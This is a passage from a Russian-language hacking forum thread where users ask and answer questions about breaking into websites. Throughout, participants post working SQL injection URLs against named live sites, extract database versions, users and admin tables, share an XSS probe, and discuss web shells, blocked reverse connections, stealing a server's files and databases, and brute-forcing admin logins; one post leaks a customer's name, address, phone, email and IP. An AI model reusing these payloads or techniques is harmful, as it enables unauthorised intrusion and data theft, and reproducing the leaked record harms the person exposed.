Просмотр полной версии : Ваши вопросы по уязвимостям.
по ошибке не видите что иньекция в подзапросе ?
что то вроде
... ((lala = 1234) and (lala2=1+and+1=0+union+select+1))
)){inj}-- 1
ну я сразу подумал про подзапросы... но хз что там как...
?id=36))
уже ошибка
Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 1
Нет, Вы не так поняли. Просто попробуйте в допустим CMS Drupal создать новость со встроенным веб-шеллом, и у него не хватит прав на исполнение, ни чтение, ни запись, ничего.
ну я сразу подумал про подзапросы... но хз что там как...
?id=36))
уже ошибка
Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 1
36))+union+select+1/*
итд...
пробовал
комментарии /*, -- и # там не работают
Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1 -- ))' at line 1
dArKkNiGHt
17.11.2009, 23:52
подскажите, насколько я понимаю, если на сайте включён mod Rewrite, то бесполезно искать уязвимость типа SQL injection ?
к примеру сайт даёт http://site.ru/news/36 но нра самом деле отсюдова идёт реврайт на скрипт http://site.ru/news/index.php?id=36
если же есть способ, озвучьте его, пожалуйста.
пробовал
комментарии /*, -- и # там не работают
Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1 -- ))' at line 1
36))+union+select+1+and+((1
итд...
подскажите, насколько я понимаю, если на сайте включён mod Rewrite, то бесполезно искать уязвимость типа SQL injection ?
к примеру сайт даёт http://site.ru/news/36 но нра самом деле отсюдова идёт реврайт на скрипт http://site.ru/news/index.php?id=36
если же есть способ, озвучьте его, пожалуйста.
смотря какой модрерайт.
встречаются обходимые
например
http://site.ru/id/1+order+by+1+--+-/
есть SQLi на сайте, версия 4.1.12 MySQL
таблицы брутил со всеми какими есть словарями, но ни одного не нашел. Там помоему префикс какой то. Подскажите есть ли как нибудь брутит префикс или обйти какими то символами?
Ну в сипте можно указзывать пути к словарям с префиксами... попробуй ним
del
Что del ? =) С ссылки нужно было начинать. Обещаю, что не буду патентовать твою скулю
details.php?id=-36))+union+select+1,2,3,4,unhex(hex(table_name)),6 ,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,1 0,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema .tables--+
Add: xотя нет, сейчас я соберу хакерскую пресс-конференцию, и оглашу эту скулю всем.
просто поля подобрал потом)
кстати там почему-то limit не работает...
limit не будет работать только если это не mysql
Pashkela
18.11.2009, 06:48
почему, длина строки запроса может быть ограничена просто
mailbrush
18.11.2009, 13:09
UID PID PPID C SZ RSS PSR STIME TTY TIME CMD
root 1 0 0 929 580 2 Jun14 ? 00:00:43 init [3]
root 2 0 0 0 0 1 Jun14 ? 00:00:00 [kthreadd]
root 3 2 0 0 0 0 Jun14 ? 00:00:03 [migration/0]
root 4 2 0 0 0 0 Jun14 ? 00:00:00 [ksoftirqd/0]
root 5 2 0 0 0 0 Jun14 ? 00:00:04 [watchdog/0]
root 6 2 0 0 0 1 Jun14 ? 00:00:01 [migration/1]
root 7 2 0 0 0 1 Jun14 ? 00:00:01 [ksoftirqd/1]
root 8 2 0 0 0 1 Jun14 ? 00:00:03 [watchdog/1]
root 9 2 0 0 0 2 Jun14 ? 00:00:01 [migration/2]
root 10 2 0 0 0 2 Jun14 ? 00:00:02 [ksoftirqd/2]
root 11 2 0 0 0 2 Jun14 ? 00:00:03 [watchdog/2]
root 12 2 0 0 0 3 Jun14 ? 00:00:00 [migration/3]
root 13 2 0 0 0 3 Jun14 ? 00:00:01 [ksoftirqd/3]
root 14 2 0 0 0 3 Jun14 ? 00:00:07 [watchdog/3]
root 15 2 0 0 0 0 Jun14 ? 00:04:46 [events/0]
root 16 2 0 0 0 1 Jun14 ? 00:03:05 [events/1]
root 17 2 0 0 0 2 Jun14 ? 00:03:28 [events/2]
root 18 2 0 0 0 3 Jun14 ? 00:04:45 [events/3]
root 19 2 0 0 0 0 Jun14 ? 00:00:00 [khelper]
root 97 2 0 0 0 0 Jun14 ? 00:00:00 [kblockd/0]
root 98 2 0 0 0 1 Jun14 ? 00:00:00 [kblockd/1]
root 99 2 0 0 0 2 Jun14 ? 00:00:00 [kblockd/2]
root 100 2 0 0 0 3 Jun14 ? 00:00:01 [kblockd/3]
root 103 2 0 0 0 1 Jun14 ? 00:00:00 [kacpid]
root 104 2 0 0 0 0 Jun14 ? 00:00:00 [kacpi_notify]
root 247 2 0 0 0 0 Jun14 ? 00:00:00 [ata/0]
root 248 2 0 0 0 1 Jun14 ? 00:00:00 [ata/1]
root 249 2 0 0 0 2 Jun14 ? 00:00:00 [ata/2]
root 250 2 0 0 0 3 Jun14 ? 00:00:00 [ata/3]
root 251 2 0 0 0 2 Jun14 ? 00:00:00 [ata_aux]
root 252 2 0 0 0 0 Jun14 ? 00:00:00 [ksuspend_usbd]
root 257 2 0 0 0 3 Jun14 ? 00:00:00 [khubd]
root 260 2 0 0 0 3 Jun14 ? 00:00:00 [kseriod]
root 333 2 0 0 0 1 Jun14 ? 00:00:00 [pdflush]
root 334 2 0 0 0 3 Jun14 ? 00:26:36 [pdflush]
root 335 2 0 0 0 2 Jun14 ? 00:00:13 [kswapd0]
root 336 2 0 0 0 0 Jun14 ? 00:00:00 [aio/0]
root 337 2 0 0 0 1 Jun14 ? 00:00:00 [aio/1]
root 338 2 0 0 0 2 Jun14 ? 00:00:00 [aio/2]
root 339 2 0 0 0 3 Jun14 ? 00:00:00 [aio/3]
root 1028 2 0 0 0 0 Jun14 ? 00:00:00 [scsi_eh_0]
root 1030 2 0 0 0 1 Jun14 ? 00:00:00 [scsi_eh_1]
root 1032 2 0 0 0 3 Jun14 ? 00:00:00 [scsi_eh_2]
root 1034 2 0 0 0 3 Jun14 ? 00:00:00 [scsi_eh_3]
root 1053 2 0 0 0 0 Jun14 ? 00:00:00 [khpsbpkt]
root 1063 2 0 0 0 1 Jun14 ? 00:00:00 [knodemgrd_0]
root 1101 2 0 0 0 1 Jun14 ? 00:00:00 [kpsmoused]
root 1106 2 0 0 0 0 Jun14 ? 00:00:00 [kondemand/0]
root 1107 2 0 0 0 1 Jun14 ? 00:00:00 [kondemand/1]
root 1108 2 0 0 0 2 Jun14 ? 00:00:00 [kondemand/2]
root 1109 2 0 0 0 3 Jun14 ? 00:00:00 [kondemand/3]
root 1114 2 0 0 0 0 Jun14 ? 00:00:00 [rpciod/0]
root 1115 2 0 0 0 1 Jun14 ? 00:00:00 [rpciod/1]
root 1116 2 0 0 0 2 Jun14 ? 00:00:00 [rpciod/2]
root 1117 2 0 0 0 3 Jun14 ? 00:00:00 [rpciod/3]
root 1120 2 0 0 0 3 Jun14 ? 00:59:16 [md3_raid1]
root 1123 2 0 0 0 0 Jun14 ? 00:00:19 [md2_raid1]
root 1126 2 0 0 0 0 Jun14 ? 00:00:02 [md1_raid1]
root 1128 2 0 0 0 0 Jun14 ? 00:00:00 [reiserfs/0]
root 1129 2 0 0 0 1 Jun14 ? 00:00:00 [reiserfs/1]
root 1130 2 0 0 0 2 Jun14 ? 00:00:00 [reiserfs/2]
root 1131 2 0 0 0 3 Jun14 ? 00:00:04 [reiserfs/3]
root 1225 1 0 3111 848 3 Jun14 ? 00:00:00 /sbin/udevd --daemon
root 1584 1 0 56282 10708 1 Jun19 ? 00:12:28 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
postfix 1663 5338 0 9562 2096 1 08:44 ? 00:00:00 pickup -l -t fifo -u
root 3776 1 0 964 512 1 Jun14 ? 00:00:30 mdadm --monitor --scan --daemonise --pid-file /var/run/mdadm.pid --syslog
apache 4064 1584 0 58211 27936 3 09:39 ? 00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4115 1584 0 58229 25840 3 09:40 ? 00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4419 1584 0 57307 22596 3 09:46 ? 00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4504 1584 0 57704 25460 3 09:48 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4505 1584 0 58098 26584 0 09:48 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root 4521 1 0 3944 1484 1 Jun14 ? 00:03:02 /usr/sbin/syslog-ng
apache 4604 1584 0 57458 24192 3 09:50 ? 00:00:02 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4605 1584 0 57377 21772 3 09:50 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4689 1584 0 57456 22288 3 09:52 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4690 1584 0 57383 22400 3 09:52 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4731 1584 0 58100 24432 2 09:53 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4808 1584 0 57700 24324 3 09:55 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4811 1584 0 57693 22308 3 09:55 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4812 1584 0 58228 26288 3 09:55 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4932 1584 0 57464 20660 3 09:58 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4933 1584 0 58223 23496 3 09:58 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4973 1584 0 58163 25112 3 09:59 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4975 1584 0 57636 21560 3 09:59 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4976 1584 0 57401 23344 3 09:59 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 4978 1584 0 57511 21264 3 09:59 ? 00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5037 4731 0 2522 744 3 10:00 ? 00:00:00 ping mail.ru
apache 5044 1584 0 57440 20392 3 10:00 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5045 1584 0 57367 21812 3 10:00 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root 5077 1 0 7797 1040 0 Jun14 ? 00:00:00 /usr/sbin/sshd
apache 5095 1584 0 57260 18820 1 10:01 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5181 1584 0 57322 18292 3 10:03 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5189 1584 0 57254 18496 3 10:03 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root 5239 1 0 3680 1176 1 Jun14 ? 00:02:11 /usr/sbin/ntpd -p /var/run/ntpd.pid
apache 5281 1584 0 57309 19008 3 10:05 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5321 1584 0 57318 15432 0 10:06 ? 00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache 5325 4505 0 3656 948 3 10:06 ? 00:00:00 ps -eF
root 5338 1 0 9549 2124 0 Jun14 ? 00:02:19 /usr/lib64/postfix/master
postfix 5360 5338 0 9576 2168 1 Jun14 ? 00:00:19 qmgr -l -t fifo -u
root 5452 1 0 4070 736 0 Jun14 ? 00:01:20 /usr/sbin/cron
root 5519 1 0 1451 680 2 Jun14 tty2 00:00:00 /sbin/agetty 38400 tty2 linux
root 5520 1 0 1451 680 2 Jun14 tty3 00:00:00 /sbin/agetty 38400 tty3 linux
root 5521 1 0 1451 680 3 Jun14 tty4 00:00:00 /sbin/agetty 38400 tty4 linux
root 5522 1 0 1451 684 1 Jun14 tty5 00:00:00 /sbin/agetty 38400 tty5 linux
root 5523 1 0 1451 680 0 Jun14 tty6 00:00:00 /sbin/agetty 38400 tty6 linux
root 29805 1 0 1451 680 2 Jun18 tty1 00:00:00 /sbin/agetty 38400 tty1 linux
apache 31617 1584 0 57632 23972 1 Aug04 ? 00:00:30 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
Какой из этих процессов является фаерволлом или антивирусом? Или по-другому вопрос задам - есть веб-шелл на сайте, ядро старое, рутаемое, но он не хочет делать бек-коннект. WGET'oм файлы тоже не скачивает, хотя which wget показывает, что WGET есть. Вывод - фаерволл блокирует исходящие соединения? Или нет?
Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:
http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x 7873716C696E6A626567696E,Version(),0x7873716C696E6 A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22--
Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм
Можно как-то в СИПТ исправить разделители?
Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:
http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x 7873716C696E6A626567696E,Version(),0x7873716C696E6 A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22--
Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм
Можно как-то в СИПТ исправить разделители?
char(120,115,113,108,105,110,106,98,101,103,105,11 0)
mailbrush, что показывает
/sbin/lsmod | grep ipt
?
Спасибо разобрался сам с 1 вопросом
Сейчас вопрос встал, возможно ли в vBulletin залить шелл через modcp или форум имея права модератора.
Всем привет
Кто нибудь заливал шелл через tiny_mce редактор? Если да, то как это возможно.
Сори если не в тему и заранее сэнк.
limit не будет работать только если это не mysql
вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет O_o
т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name
есть у кого предположения почему там так?
Pashkela
18.11.2009, 19:56
т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name
i'm sorry, а что еще можно пытаться выбрать из information_schema.columns, кроме как column_name? И, самое главное, зачем?
Какой из этих процессов является фаерволлом или антивирусом? Или по-другому вопрос задам - есть веб-шелл на сайте, ядро старое, рутаемое, но он не хочет делать бек-коннект. WGET'oм файлы тоже не скачивает, хотя which wget показывает, что WGET есть. Вывод - фаерволл блокирует исходящие соединения? Или нет?
акромя wget есть и другие качалки.
пропатчить ядро никто не мешал админу- а имя системы можно вообще любое вписать :)
http://www.opennet.ru/docs/RUS/iptables/
DrAssault
18.11.2009, 20:02
вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет O_o
т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name
есть у кого предположения почему там так?
Дай ссылочку, глянем ;)
Pashkela, можно попытаться TABLE_SCHEMA и TABLE_NAME
ну с лимитом то почему не работало в этом случае, хз
в принципе конечно да, это не нужно
На сервере где залит шелл стойт safe-mode
Задача слить все файлы и БД
Как это можно сделать, слышал что существуют архиваторы написанные на PHP
Или чтонить что переместит файлы на мой ftp
jecka3000
18.11.2009, 20:49
с XSS дел почти никогда не имел,но на одном сайте нашел, интересно пассивная или актив? Что то можно выжить или нет?
http://www.cian.ru/cat.php?p=1&suburbian=yes&totime=%22%3E%3Cscript%3Ealert%28%27HAcKeD!%27%29% 3C%2Fscript%3E%3C%22&deal_type=2&metro[1]=276&object_type[1]=2&order=4
вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет O_o
т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name
есть у кого предположения почему там так?
Я не понял что у тебя срабатывает, что не срабатывает. Самая заурядная скуля
-36))+union+select+1,2,3,4,unhex(hex(group_concat(t able_name))),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+info rmation_schema.columns+where+column_name+like+0x25 757365726e616d6525--+
-36))+union+select+1,2,3,4,5,unhex(hex(group_concat (column_name))),7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+inf ormation_schema.columns+where+table_name=0x6578707 45f75736572--+
-36))+union+select+1,2,3,4,unhex(hex(username)),6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,1+from+expt_user+limit+0,1--+
нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
нашел директорию админки, кто нит знает онлайн утилиты для брута пасса http html form?
https://forum.antichat.net/thread109600.html
Дайте пожалуйста ответ по этой теме:http://forum.antichat.ru/thread155501.html
(0000000039, 'jeffery', 'brown', 'pyramid lock', 'pyramidlock@hotmail.com', '26434 lorenz', '', 'madison heights', 'mi', '48071', 'US', '248-837-9605', 'uKrNsZydbo8=', '0.00', '', '2008-10-18', '', 0, 'MasterCard', 0xad0dcd773619ed1d768fbeb219b14c3a0a23595ef189088a c8ba3ce3a5001944, 0x0a23595ef189088ac8ba3ce3a5001944, 0x5ea4b9f8995d33027b5f3e4b154e8d54, 0x0a23595ef189088ac8ba3ce3a5001944, '2009-09-15 19:05:24', '68.43.87.206', 'c-68-43-87-206.hsd1.mi.comcast.net', 'Active', ''),
В чем это зашифровано?
0x5ea4b9f8995d33027b5f3e4b154e8d54
Пробовал как Hex неполучается
В чем это зашифровано?
0x5ea4b9f8995d33027b5f3e4b154e8d54
Пробовал как Hex неполучается
если я не ошибаюсь 0x+md5(), т.к.:
strlen(5ea4b9f8995d33027b5f3e4b154e8d54)=32;
&
[a-f0-9]
Axelhack
20.11.2009, 01:23
Всем привет,
2 вопроса
1. Бесплатный хостинг для XSS и
2. сканер XSS багов на сайте.
Прошу помочь. Благодарен Axelhack.
p.r0phe.t
20.11.2009, 07:44
Подскажите, сканер выплюнул:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать?
ФТП может висеть на удп? если да,то как приконектиться?
кто может подсказать по скуле в
http://www.pngbd.com/photos/showgallery.php?cat=1'
Никак не выходит, толи поля не подпираются, толи фильтр какой-то
HAXTA4OK
20.11.2009, 10:26
тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд
почему я подумал про скобку )))
http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3 ,4%23
есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
Подскажите, сканер выплюнул:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
p.r0phe.t
20.11.2009, 15:25
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,passw ord,3,4+from+matryx_photos.users%23
видимо стоят фильтры на password,users итд есть идеи как обойти?
Емпти сет. Эта табличка пустая
999')+UNION+SELECT+1,count(*),3,4+from+users--+
Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу:
http://www.site.ru/vn84.php?id=’ OR ’1’=’1’
Выдает такая ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2
на сколько это серьезная ошибка и можно ли раскрутить это дальше ?
а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
2B1t.exe
id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14, concat(0x27,version())+--+
мне кажется там можно замутить инклюд или читалку файлов
Scipio
угу. теперь вроде версия да появился ?
http://www.site.ru/vn84.php?id=id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14, concat(0x27,version())+--+
выдает:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4.1.22'' at line 2
получется иммем MySQL версии 4.1.22 ?
DrAssault
20.11.2009, 18:58
получется иммем MySQL версии 4.1.22 ?
Ну получается что так :)
2B1t.exe
id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,concat(0x27,id)+from+admin+limit+0,1+--+
z00MAN
че-то не каннает ! :(
делаю такой запрос:
http://www.site.ru/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,concat(0x27,id)+from+admin+limit+0,1+--+
но получаю такое:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 2
Adm1n4eG
20.11.2009, 22:50
2B1t.exe
попробуй вместо + использовать /**/ или в конеце вместо -- ставить например /* или вместо -1 поставь 9999999999 или 1' пробуй разные вариаты...
z00MAN
че-то не каннает ! :(
делаю такой запрос:
http://www.site.ru/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,concat(0x27,id)+from+admin+limit+0,1+--+
но получаю такое:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 2
Ну и че те не канает?
Выдалож id==1
Adm1n4eG
пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте !
вот только при запросе:
http://www.site.ru/index.php?id=1'%20union%20select%201,2,3,4,5,6,7,8 ,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+
получил уже такое :)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id) from admin li' at line 2
жель не знаю как юзать дальше...
-------
Кстати, если ввести такое:
http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина:)
http://i078.radikal.ru/0911/6e/4e38be075f71.jpg
И как я понял - это говорит о потенциальном XSS опасности.
Adm1n4eG
пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте !
вот только при запросе:
http://www.site.ru/index.php?id=1'%20union%20select%201,2,3,4,5,6,7,8 ,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+
получил уже такое :)
жель не знаю как юзать дальше...
-------
Кстати, если ввести такое:
http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина:)
http://i078.radikal.ru/0911/6e/4e38be075f71.jpg
И как я понял - это говорит о потенциальном XSS опасности.
Tсли есть вывод из sql-inj данных на страницу(ну блин, любую строку можно внедрить в html а броузер потом её обработает), то всегда есть опасность xss. в твоем случае я вижу обрезание тега <script>
получаеться все? не получиться раскрутить это?
Shaitan-Devil
21.11.2009, 00:46
получаеться все? не получиться раскрутить это?
Если IE обрезает, xss может действовать в других браузерах.
Если IE обрезает, xss может действовать в других браузерах.
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
Ну тут скуля, тебе ж уже отписали выше
http://www.ru/vn84.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(0x27,concat_ws(0x2F,version(),database(),user ()))+from+admin+limit+0,1--+
4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223
Подбирай названия столбцов таблицы admin
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
с именами колонок в 4 версии туговато, квазар читает тему если что подправит наверно), а вообще, можно выводить данные не зная имена колонок,
/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+ad min+a+join+admin+b)c--+1
где то мы разбирали это
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
Я думал,у тебядве ощибки вместе было(про тфтп и эту хрень).Значит,у меня было что-то другое.Без скрина всё равно не пойму).
DrAssault
21.11.2009, 04:09
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Ты не видишь в какой они последовательности написанны при sql инъекции? :confused: И что тут не понятного...
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
Быть может они предположили и попробовали?! Такой метод называется ручной брут...
получается, что blind SQL ?
Какой ещё блайнд? Вывод на месте...
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Ручной брут + процесс можно автоматизировать, иногда в зависимости от особенности основного запроса можно узнать таблицы при помощи procedure analise() и т.д. и т.п.
